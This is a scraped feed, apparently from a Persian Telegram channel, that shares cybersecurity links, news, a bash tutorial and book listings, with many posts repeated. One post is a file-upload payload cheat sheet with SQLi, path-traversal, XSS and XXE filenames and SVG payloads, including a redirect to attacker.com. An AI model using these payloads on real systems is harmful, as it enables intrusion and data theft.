مقاله ی صبح شنبه
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی
**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟
https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051
@Engineer_Computer
دیتا مدل های کشف
کاهش خطا در تحلیل های امنیتی
**حتی CrowdStrike هم ممکن است در تحلیل و ارائه رول برای کشف اشتباه کند . لذا چه کنیم که دچار خطا نشویم ؟
https://medium.com/@vanvleet/improving-threat-identification-with-detection-data-models-1cad2f8ce051
@Engineer_Computer
Medium
Improving Threat Identification with Detection Modeling
In this post, I’ll present a simple approach to detection modeling and demonstrate how a Detection Data Model helps identify threats.
#موقت
Mastering of Python Script for System Administrator
Coupon : 25FC2EF9F608AA536822
Link :
https://www.udemy.com/course/mastering-of-python-noscript-for-system-administrator/?couponCode=25FC2EF9F608AA536822
@Engineer_Computer
Mastering of Python Script for System Administrator
Coupon : 25FC2EF9F608AA536822
Link :
https://www.udemy.com/course/mastering-of-python-noscript-for-system-administrator/?couponCode=25FC2EF9F608AA536822
@Engineer_Computer
🔥3
با ETW بصورت عمیق آشنا شوید
https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/
@Engineer_Computer
https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/
@Engineer_Computer
The Trail of Bits Blog
ETW internals for security research and forensics
Why has Event Tracing for Windows (ETW) become so pivotal for endpoint detection and response (EDR) solutions in Windows 10 and 11? The answer lies in the value of the intelligence it provides to security tools through secure ETW channels, which are now also…
Chaining Vulnerabilities through File Upload
SLQi
Path traversal
XSS
Open redirect
XXE
@Engineer_Computer
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"
-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>
XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
@Engineer_Computer
⭕️ استفاده از مدلهای Large Language Models (LLMs) در کشف آسیب پذیریها به شکل چشمگیری امنیت سایبری را متحول میکند، با خودکارسازی شناسایی آسیبپذیریها، بهبود تحلیل تهدیدها. این مدلهای پیشرفته، مانند GPT-4، به طور قابل توجهی بهرهوری را با اسکن سریع کد، Generating Test Cases و ارائه گزارشهای دقیق از آسیبپذیریها بهبود میبخشند.
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
👍2❤1
MITRE research firm reveals alarming details about a recent cyber attack that dates back to late 2023.
Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure.
🔗 Read details:
https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html
@Engineer_Computer
Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure.
🔗 Read details:
https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html
@Engineer_Computer
👍1
یک فریم ورک محبوب متن باز برای C2
** فکر کنید حالا که EDR را دور میزند چه کنیم ؟
https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b
@Engineer_Computer
** فکر کنید حالا که EDR را دور میزند چه کنیم ؟
https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b
@Engineer_Computer
Medium
Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1)
Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1) DISCLAIMER: Using these tools and methods against hosts that you do not have explicit permission to test is illegal. You are responsible for any …
🔴 خطر حمله RCE به میلیونها دستگاه با آسیبپذیریهای بحرانی OpenVPN
محققان مایکروسافت به تازگی چندین آسیبپذیری با شدت متوسط و به بالا را در OpenVPN که یک نرمافزار متنباز VPN پرکاربرد است را کشف کردهاند.
نرمافزار OpenVPN توسط هزاران شرکت در صنایع مختلف، ازجمله فناوری اطلاعات، خدمات مالی، مخابرات و نرمافزارهای کامپیوتری، بر روی پلتفرمهای اصلی مانند Windows، iOS، macOS، Android و BSD استفاده میشود.
این آسیبپذیریها میتوانند برای دستیابی به اجرای کد از راه دور (RCE) و افزایش اختیار محلی مورد سواستفاده قرار گیرند، که میتواند به مهاجمان اجازه دهد کنترل کامل دستگاههای هدف را به دست آورند. این امر خطر نقض دادهها، به خطر افتادن سیستم و دسترسی غیرمجاز به اطلاعات حساس را به همراه دارد.
آسیبپذیریها در معماری سمت سرویس گیرنده OpenVPN، به ویژه در مکانیسم ارتباطی بین فرآیند openvpn[.]exe و سرویس openvpnserv[.]exe شناسایی شدند.
#Cybersecurity #Cyber_Attack #OpenVPN #RCE #DoS #VPN #Windows #Android #macOS #Vulnerability #امنیت_سایبری #حمله_سایبری #وی_پی_ان #ویندوز #مک
@Engineer_Computer
محققان مایکروسافت به تازگی چندین آسیبپذیری با شدت متوسط و به بالا را در OpenVPN که یک نرمافزار متنباز VPN پرکاربرد است را کشف کردهاند.
نرمافزار OpenVPN توسط هزاران شرکت در صنایع مختلف، ازجمله فناوری اطلاعات، خدمات مالی، مخابرات و نرمافزارهای کامپیوتری، بر روی پلتفرمهای اصلی مانند Windows، iOS، macOS، Android و BSD استفاده میشود.
این آسیبپذیریها میتوانند برای دستیابی به اجرای کد از راه دور (RCE) و افزایش اختیار محلی مورد سواستفاده قرار گیرند، که میتواند به مهاجمان اجازه دهد کنترل کامل دستگاههای هدف را به دست آورند. این امر خطر نقض دادهها، به خطر افتادن سیستم و دسترسی غیرمجاز به اطلاعات حساس را به همراه دارد.
آسیبپذیریها در معماری سمت سرویس گیرنده OpenVPN، به ویژه در مکانیسم ارتباطی بین فرآیند openvpn[.]exe و سرویس openvpnserv[.]exe شناسایی شدند.
#Cybersecurity #Cyber_Attack #OpenVPN #RCE #DoS #VPN #Windows #Android #macOS #Vulnerability #امنیت_سایبری #حمله_سایبری #وی_پی_ان #ویندوز #مک
@Engineer_Computer
👍1
In today's world of expanding digital communications, APIs serve as crucial bridges between systems. Given their importance, defending APIs against attacks and malicious intrusions has become a key priority. Implementing advanced security protocols, robust authentication, and continuous monitoring are among the strategies that can ensure API security and protect sensitive data.
@Engineer_Computer
@Engineer_Computer
Do you often wonder how to use PowerShell 7 in the server without switching to SSH-based remoting?
https://awakecoding.com/posts/enable-powershell-winrm-remoting-in-powershell-7/
@Engineer_Computer
https://awakecoding.com/posts/enable-powershell-winrm-remoting-in-powershell-7/
@Engineer_Computer
Docs
PowerShell Remoting Over SSH - PowerShell
Explains how to set up the SSH protocol for PowerShell remoting.
💠چگونه در زبان بش از یک تابع، یک مقدار را برگردانیم؟
مثال در python:
خروجی کد بالا عدد ۷ خواهد بود.
بش: (روش اول)
روش دوم: (کوتاهتر)
توضیحات:
در روش اول که کمی طولانیتره، ما میام خروجی تابع رو با استفاده از متغیر داخلی بش ?$ نمایش میدیم. این متغیر درواقع exit code دستور قبلی رو ذخیره میکنه.
توابع در بش مقداری رو مثل پایتون برنمیگردونن و صرفا exit code که عددی بین ۰ تا ۲۵۵ است رو برمیگردونن.
در تابع add، عبارت return درواقع باعث میشه که جمع آرگومانهای تابع بهعنوان exit status گزارش بشه.
متغیر داخلی ?$ این exit status رو ذخیره میکنه، که میشه جمع ۳ و ۴ و عدد ۷ رو نمایش میده.
در مثال دوم که سادهتره و راحتتر هم هست ما پارامترهای 1$ و 2$ رو به تابع میدیم و از اونجایی که اکو در تابع تعریف شده، مقدار برگردانده میشه و در ترمینال چاپ میشه.
@Engineer_Computer
#آموزش #لینوکس #بش
مثال در python:
def add(x, y):
return x + y
result = add(3, 4)
print(result)
خروجی کد بالا عدد ۷ خواهد بود.
بش: (روش اول)
#!/bin/bash
add() {
return $(($1 + $2))
}
add 3 4
result=$?
echo $result
روش دوم: (کوتاهتر)
#!/bin/bash
add() {
echo $(($1 + $2))
}
add 3 4
توضیحات:
در روش اول که کمی طولانیتره، ما میام خروجی تابع رو با استفاده از متغیر داخلی بش ?$ نمایش میدیم. این متغیر درواقع exit code دستور قبلی رو ذخیره میکنه.
توابع در بش مقداری رو مثل پایتون برنمیگردونن و صرفا exit code که عددی بین ۰ تا ۲۵۵ است رو برمیگردونن.
در تابع add، عبارت return درواقع باعث میشه که جمع آرگومانهای تابع بهعنوان exit status گزارش بشه.
متغیر داخلی ?$ این exit status رو ذخیره میکنه، که میشه جمع ۳ و ۴ و عدد ۷ رو نمایش میده.
در مثال دوم که سادهتره و راحتتر هم هست ما پارامترهای 1$ و 2$ رو به تابع میدیم و از اونجایی که اکو در تابع تعریف شده، مقدار برگردانده میشه و در ترمینال چاپ میشه.
@Engineer_Computer
#آموزش #لینوکس #بش
👍1
WebApp_Sec.pdf
14.2 MB
Techbook
WebApp Security
Web Application Security:
Exploitation and Countermeasures for Modern Web Applications 2024.
——————————————————
#CyberSecurity #webapp #OWASP #secure
@Engineer_Computer
WebApp Security
Web Application Security:
Exploitation and Countermeasures for Modern Web Applications 2024.
——————————————————
#CyberSecurity #webapp #OWASP #secure
@Engineer_Computer
❤1
Hardware Security
PKfail Research Report 2024.
https://www.binarly.io/blog/pkfail-u
@Engineer_Computer
——————————————————
#CyberSecurity #Hardware #CVE
#SecureBusinessContinuity
PKfail Research Report 2024.
https://www.binarly.io/blog/pkfail-u
@Engineer_Computer
——————————————————
#CyberSecurity #Hardware #CVE
#SecureBusinessContinuity
info
OSINT
End-of-life (EOL) and support information
for various products
https://endoflife.date
@Engineer_Computer
OSINT
End-of-life (EOL) and support information
for various products
https://endoflife.date
@Engineer_Computer
endoflife.date
Home
Check end-of-life, support schedule, and release timelines for more than 380+ products at one place.
Cisco_ThousandEyes_Digital_Experience_Monitoring_and_Troubleshooting.pdf
23.9 MB
Year : 2025
Pages : 683 Edition : null
#security #cybersecurity #network #Monitoring #cisco #book
@Engineer_Computer
Pages : 683 Edition : null
#security #cybersecurity #network #Monitoring #cisco #book
@Engineer_Computer